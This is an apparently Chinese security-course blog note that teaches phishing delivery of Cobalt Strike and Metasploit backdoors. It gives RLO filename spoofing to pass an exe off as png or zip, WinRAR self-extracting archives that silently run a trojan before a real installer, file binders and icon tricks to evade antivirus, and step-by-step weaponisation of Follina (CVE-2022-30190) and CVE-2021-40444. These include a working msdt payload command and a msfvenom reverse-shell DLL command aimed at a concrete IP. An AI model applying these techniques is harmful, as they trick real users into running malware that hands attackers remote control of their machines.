154-钓鱼篇&Offfice-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

#知识点:

1、文件名-RLO 伪装-后缀

2、压缩文件-自解压-运行

3、捆绑文件-打包加载-运行

4、Office 套件-漏洞钓鱼-CVE

 

#文件后缀-钓鱼伪装-RLO

cs生成一个exe后门

重命名为一个png反过来或者jpg反过来的名字

然后再g前面输入其他字符在g字符前面右键选择这个插入RLO

然后就会惊奇的发现名字反过来了,以png后缀结尾并且程序任然还是一个exe文件可以正常的上线

 

#压缩文件-自解压-释放执行

压缩两个文件为一个文件

使用到的压缩工具为winrar

WinRAR - 压缩软件 老牌压缩软件知名产品 经典装机软件之一

准备一个正常的exe安装程序,一个木马exe

选择两个exe右键

勾选

点击

填写解压路径,这里就是解压后文件会被解压到这里。

这里就是解压后运行什么东西,我这里选择先运行木马然后运行正常的程序

这里选择隐藏,一般解压不是有个进度条还会显示解压到哪个文件夹下面,选了这个就看不到了

再勾选这两个

然后确定就会生成一个文件,不过还是一个exe文件

可以把这个exe修改为winrar的样子,这样一来无论是外观还是点击后的内容都和winrar做的事情一样了

当然也可以直接把这个exe伪装为zip文件,用前面的RLO方式

点击这个zip直接丝滑上线,并且会自动运行正常的winrar安装包

然后在路径盘可以看到解压的两个文件

不过如果我右键选择解压到还是会自动解压出原本的两个文件,所以我觉得还是不要伪装为zip直接就是伪装为安装包就可以,再zip压缩一下更像了

#捆绑文件-打包加载-释放执行

使用文件捆绑器将两个文件捆绑为一个文件,宿主文件就选正常的winrar,捆绑文件就选木马

工具链接:夸克网盘分享

这个看着和上面那个好像差不多。

修改图标使用工具进行修改,直接拖上去就可以,修改完后可能不会立马变样系统有缓存改个名字就好了

工具链接:夸克网盘分享

有些杀软会对捆绑器进行识别拦截,所以选择捆绑器也是绕过杀软的一个步骤。视频中的另一个捆绑工具:夸克网盘分享

 

#Office 套件-CVE 漏洞-MSF&CS

office套件安装工具以及激活工链接:夸克网盘分享

-Microsoft MSDT CVE-2022-30190 代码执行

GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

该漏洞首次发现在 2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件, 通过 ms-msdt MSProtocol URI 方法来执行恶意 PowerShell 代码。感染过程利用 程序 msdt.exe,该程序用于运行各种疑难解答程序包。

此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可 以使用 ms-msdt URI 执行任意 PowerShell 代码。

目前已知影响的版本为:

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365

项目 GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

使用代码自查是否存在漏洞,如果弹出计算器就是

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

使用工具安装了office套件2019,2021版本在虚拟机上面经过测试都没搞出存在漏洞的情况。所以无法复现了这里

原项目是会下载一个nc然后使用nc反弹,这里我们修改实现下载木马上线,所以需要修改一下内容

先cs生成一个exe的后门

在后门的目录下起个http服务,当然实战中需要在自己的vps来充当服务器

然后修改项目的follina.py的代码,在第111行处修改内容为本机的ip和8088端口,这个项目的实际作用也是在这里下载一个nc然后调用cmd去执行nc进行反弹。

MicroSoft MSHTML CVE-2021-40444 远程代码执行

影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 等各个主流版本

利用项目 GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

1、安装依赖:

apt-get install lcab(可能有的环境没有安装zip顺便把zip也安装一下后面要用到zip)

2、生成DLL:

msfvenom -p windows/meterpreter/reverse tcp lhost=47.94.236.117 lport=9999 -f dll>shell.dll 使用cs也可以

3、msf开启监听

4、生成文档

将dll放置到CVE的文件夹下面

python3 exploit.py generate shell.dll http://vpsip:10000

5、监听文档

python3 exploit.py host 10000

6、将生成当前文件夹的doc文档取出然后点击上线,msf或cs就会上线,监听10000端口会有访问的浏览数据记录

我这个也没有复现成功,步骤没有问题应该是虚拟机也不存在这个漏洞。。。这个日志中要出现一个word.cab的访问记录就对了

另外这两个CVE无法免杀,因为杀的是漏洞,还有一个CVE的漏洞太老了就没讲了。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值